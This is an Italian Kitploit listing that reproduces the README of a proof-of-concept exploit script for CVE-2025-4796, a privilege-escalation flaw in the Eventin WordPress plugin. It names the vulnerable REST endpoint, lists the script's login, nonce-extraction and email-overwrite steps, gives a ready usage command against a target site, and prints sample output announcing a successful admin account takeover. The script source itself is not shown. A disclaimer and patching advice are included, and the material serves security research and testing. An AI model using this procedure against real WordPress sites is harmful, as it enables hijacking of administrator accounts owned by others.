Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-4796 — Eventin <= 4.0.34 - Escalation dei privilegi autenticata (Contributore+) tramite modifica dell'email utente/compromissione dell'account | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-4796
Autenticazione e AutorizzazioneEscalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e Formazione
GitHubnxploited/cve-2025-4796

CVE-2025-4796

Eventin <= 4.0.34 - Escalation dei privilegi autenticata (Contributore+) tramite modifica dell'email utente/compromissione dell'account

Vedi Repository
310 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-4796

Eventin <= 4.0.34 - Escalation dei privilegi autenticata (Contributor+) tramite modifica email utente/Account Takeover

🛡️ Eventin <= 4.0.34 - Escalation dei privilegi autenticata (Contributor+) (CVE-2025-4796)

📌 Panoramica

Questo repository documenta una vulnerabilità di escalation dei privilegi nel plugin WordPress Eventin (<= 4.0.34) che consente a un utente autenticato con capacità Contributor+ di modificare gli indirizzi email di utenti arbitrari tramite l'API di aggiornamento speaker del plugin. Modificando l'email di un amministratore, un attaccante può attivare la procedura di reset della password e ottenere il controllo dell'account.

  • Componente vulnerabile: plugin WordPress Eventin (Eventin\Speaker\Api\SpeakerController::update_item)

  • Versioni interessate: <= 4.0.34

  • CVE: CVE-2025-4796

  • CVSS: 8.8 (Alta)

  • Installazioni attive: 10.000+

⚠️ Dettagli della vulnerabilità

Eventin non valida correttamente l'identità o le capacità del chiamante prima di aggiornare i dettagli dello speaker/utente (in particolare l'email). Un attaccante autenticato come contributore (o superiore) può modificare l'indirizzo email di altri utenti — inclusi gli amministratori — utilizzando l'endpoint REST del plugin:

  • PUT /wp-json/eventin/v2/speakers/<speaker_id>

Una volta modificata l'email con un indirizzo controllato dall'attaccante, il flusso standard di reset della password di WordPress può essere utilizzato per prendere il controllo dell'account.

🧰 Script (PoC)

Nome file: CVE-2025-4796.py

Questo script automatizza i seguenti passaggi:

  1. Accede al sito WordPress di destinazione utilizzando le credenziali fornite.
  2. Estrae l'X-WP-Nonce richiesto
  3. Invia una richiesta PUT a /wp-json/eventin/v2/speakers/<speaker_id> per aggiornare l'email dello speaker.
  4. Stampa e formatta la risposta JSON e un messaggio di successo professionale.

Requisiti:

  • Python 3.8+
  • requests

Installazione:

root@kitploit:~
pip install requests

🚀 Utilizzo

Esegui lo script dalla riga di comando:

root@kitploit:~
python CVE-2025-4796.py -u https://target.site -id 9 -email [email protected] -user contributor_user -pass contributor_password

Mostra l'aiuto dello script:

root@kitploit:~
python CVE-2025-4796.py -h

📝 Opzioni della CLI (help)

root@kitploit:~
usage: CVE-2025-4796.py [-h] -u URL -id SPEAKER_ID -email EMAIL -user USERNAME -pass PASSWORD

Exploit For: CVE-2025-4796 By: Nxploited

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress site URL
  -id, --speaker_id SPEAKER_ID
                        Enter the speaker ID for the user
  -email, --email EMAIL
                        Enter a new email address
  -user, --username USERNAME
                        Enter the username for the account to upgrade
  -pass, --password PASSWORD
                        Enter the password for the account to upgrade


✅ Esempio di output riuscito

root@kitploit:~
[*] Please wait, exploitation starting ...
[*] Disabling SSL warnings ...
[*] Logging in to WordPress ...
[+] Logged in successfully.
[*] Extracting nonce value ...
[+] Nonce extracted: fc0ab7b983
[*] Exploiting and updating speaker info ...

[+] Exploitation in progress, please wait ...

[+] Exploitation successful.
[+] The account has been updated to Admin.
    Speaker ID   : 9
    Email        : [email protected]

[!] Please reset your password using the email: [email protected]

⚖️ Divulgazione responsabile e disclaimer

  • Questo repository è fornito per scopi di ricerca sulla sicurezza, test e difesa.
  • Non utilizzare queste tecniche contro sistemi che non possiedi o per i quali non hai un'autorizzazione esplicita al test.
  • Lo sfruttamento non autorizzato di vulnerabilità è illegale e non etico.
  • Se sei il proprietario di un sito e ritieni di essere vulnerabile, aggiorna Eventin all'ultima versione o applica immediatamente le patch del fornitore.
  • Utilizza questo codice solo in ambienti autorizzati (laboratorio, penetration test approvato dal cliente o con permesso esplicito).

🧾 Cosa fa lo script (in sintesi)

  • Valida gli input (URL, email) e normalizza lo schema dell'URL.
  • Disabilita gli avvisi SSL (opzionale; utilizzato per supportare i test contro istanze di sviluppo con certificati self-signed).
  • Effettua l'accesso utilizzando le credenziali WP fornite e valida il login tramite cookie.
  • Recupera l'X-WP-Nonce dalla pagina di amministrazione.
  • Invia una richiesta PUT autenticata per aggiornare l'email dello speaker.
  • Stampa la risposta JSON formattata e un riepilogo finale di successo leggibile.

👤 Crediti

Di: Khaled Alenaz (Nxploited)
GitHub: https://github.com/Nxploited/

Scarica lo strumento